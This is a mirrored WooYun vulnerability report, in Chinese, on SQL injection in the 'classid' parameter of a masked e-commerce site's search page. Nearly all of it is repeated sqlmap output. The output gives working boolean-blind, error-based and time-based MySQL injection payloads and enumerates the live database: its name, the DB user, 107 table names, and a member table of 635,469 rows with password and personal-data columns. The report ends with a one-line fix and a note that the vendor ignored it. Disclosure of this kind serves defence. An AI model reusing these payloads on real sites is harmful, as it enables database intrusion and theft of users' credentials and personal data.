乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-02-19: 细节已通知厂商并且等待厂商处理中 2016-02-24: 厂商已经主动忽略漏洞,细节向公众公开
。。。
http://**.**.**.**/index.php?app=search&vip=1&act=seller&classid=435&type=imgclassid存在注入
Database: aajflm+------------+---------+| Table | Entries |+------------+---------+| ecm_member | 635469 |+------------+---------+
sqlmap identified the following injection point(s) with a total of 591 HTTP(s) requests:---Parameter: classid (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: app=search&vip=1&act=seller&classid=435 RLIKE (SELECT (CASE WHEN (4931=4931) THEN 435 ELSE 0x28 END))&type=img Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT 9228 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(9228=9228,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&type=img Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT * FROM (SELECT(SLEEP(5)))JkXe)&type=img Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---web application technology: PHP 5.2.17back-end DBMS: MySQL 5.0current user: 'o2oxx@localhost'current database: 'aajflm'current user is DBA: Falseavailable databases [2]:[*] aajflm[*] information_schemasqlmap resumed the following injection point(s) from stored session:---Parameter: classid (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: app=search&vip=1&act=seller&classid=435 RLIKE (SELECT (CASE WHEN (4931=4931) THEN 435 ELSE 0x28 END))&type=img Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT 9228 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(9228=9228,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&type=img Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT * FROM (SELECT(SLEEP(5)))JkXe)&type=img Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---web application technology: PHP 5.2.17back-end DBMS: MySQL 5.0Database: aajflm[107 tables]+--------------------------+| ecm_acategory || ecm_address || ecm_article || ecm_attribute || ecm_bankcard || ecm_bankcard_record || ecm_brand || ecm_bvlog || ecm_cart || ecm_category_goods || ecm_category_store || ecm_cflog || ecm_collect || ecm_comment || ecm_consumption_code || ecm_coupon || ecm_coupon_sn || ecm_exchange || ecm_financial || ecm_financial_records || ecm_financial_records_ls || ecm_friend || ecm_function || ecm_gcategory || ecm_goods || ecm_goods_adv || ecm_goods_attr || ecm_goods_cart || ecm_goods_image || ecm_goods_order || ecm_goods_qa || ecm_goods_spec || ecm_goods_spec_images || ecm_goods_statistics || ecm_groupbuy || ecm_groupbuy_log || ecm_incomebrand || ecm_incomelog || ecm_incomeshop || ecm_jflog || ecm_jfrestrictlog || ecm_jy_income || ecm_ka_cart || ecm_ka_order || ecm_ka_order_goods || ecm_lottery || ecm_mail_queue || ecm_mcc || ecm_member || ecm_member_account || ecm_member_examrank || ecm_message || ecm_module || ecm_myarea || ecm_mycity || ecm_myprovince || ecm_navigation || ecm_order || ecm_order_extm || ecm_order_goods || ecm_order_log || ecm_pageview || ecm_partner || ecm_payment || ecm_pos_records || ecm_pos_shop || ecm_poslog || ecm_posmember || ecm_poss || ecm_postal || ecm_privilege || ecm_pro_bvrecord || ecm_proposal || ecm_recommend || ecm_recommended_goods || ecm_region || ecm_sales || ecm_scategory || ecm_scope || ecm_sessions || ecm_sessions_data || ecm_sgrade || ecm_shipping || ecm_shop || ecm_shop_10yuan || ecm_shop_change_log || ecm_shop_goods || ecm_shop_ka || ecm_shop_member || ecm_shoptype || ecm_shopujf || ecm_spreader_member || ecm_store || ecm_tmpuser || ecm_ukinds || ecm_uploaded_file || ecm_user_cf || ecm_user_change_log || ecm_user_coupon || ecm_user_priv || ecm_user_project || ecm_wealthbean || ecm_withdrawals || ecm_yqf_data || ecm_zsjflog || sj_level || sj_member |+--------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: classid (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: app=search&vip=1&act=seller&classid=435 RLIKE (SELECT (CASE WHEN (4931=4931) THEN 435 ELSE 0x28 END))&type=img Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT 9228 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(9228=9228,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&type=img Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT * FROM (SELECT(SLEEP(5)))JkXe)&type=img Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---web application technology: PHP 5.2.17back-end DBMS: MySQL 5.0Database: aajflm+------------+---------+| Table | Entries |+------------+---------+| ecm_member | 635469 |+------------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: classid (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: app=search&vip=1&act=seller&classid=435 RLIKE (SELECT (CASE WHEN (4931=4931) THEN 435 ELSE 0x28 END))&type=img Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT 9228 FROM(SELECT COUNT(*),CONCAT(0x716a706b71,(SELECT (ELT(9228=9228,1))),0x716a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&type=img Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: app=search&vip=1&act=seller&classid=435 AND (SELECT * FROM (SELECT(SLEEP(5)))JkXe)&type=img Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---web application technology: PHP 5.2.17back-end DBMS: MySQL 5.0Database: aajflmTable: ecm_member[43 columns]+-----------------+---------------------+| Column | Type |+-----------------+---------------------+| level | int(11) || activation | varchar(60) || agreeprot | tinyint(1) || birthday | date || cncode | varchar(25) || dcncode | varchar(25) || dlevel | int(11) || double_count | decimal(10,2) || double_overtime | varchar(30) || double_status | int(10) || email | varchar(60) || examrankid | int(11) || feed_config | text || fgtimes | int(11) || gender | tinyint(3) unsigned || im_aliww | varchar(60) || im_msn | varchar(60) || im_qq | varchar(60) || im_skype | varchar(60) || im_yahoo | varchar(60) || isblack | tinyint(4) || isshop | int(11) || last_ip | varchar(15) || last_login | int(10) unsigned || lgtimes | int(11) || logins | int(10) unsigned || ngtimes | int(11) || openshop | int(11) || outer_id | int(10) unsigned || password | varchar(32) || phone_mob | varchar(60) || phone_tel | varchar(60) || portrait | varchar(255) || qxsh | tinyint(1) || real_name | varchar(60) || reg_time | int(10) unsigned || shopid | int(11) || shopnum | int(11) || tmpshopnum | int(11) || tpassword | varchar(32) || ugrade | tinyint(3) unsigned || user_id | int(10) unsigned || user_name | varchar(60) |+-----------------+---------------------+
参数过滤,参数化查询
危害等级:无影响厂商忽略
忽略时间:2016-02-24 16:30
漏洞Rank:15 (WooYun评价)
暂无